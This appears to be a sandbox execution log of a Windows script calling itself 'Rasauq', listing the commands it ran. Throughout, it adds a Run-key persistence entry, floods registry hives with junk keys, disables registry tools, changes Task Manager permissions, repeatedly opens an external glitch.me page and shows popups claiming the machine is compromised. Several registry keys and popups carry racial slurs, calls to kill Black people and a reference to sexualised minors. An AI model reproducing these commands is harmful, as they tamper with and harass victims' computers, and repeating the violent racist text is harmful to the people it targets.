C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\powercfg.exe
powercfg /hibernate off REM Disables hibernation
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "Device Name"
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "USB Root Hub"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCR\behead all niggers" /f
C:\Windows\system32\reg.exe
reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "End of search: 26 match(es) found.\Software\Rasauq on top" /f
C:\Windows\system32\msg.exe
msg * /time:3 "This machine has been compromised by Rasuaq"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffb56a1f208,0x7ffb56a1f214,0x7ffb56a1f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5020,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5352,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5368 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5528,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6028,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6336,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6548,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6832,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7284,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7296 /prefetch:8
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7660,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7668 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=8076,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=8500,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8520 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7872 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=8280,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8068 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6140,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7816 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
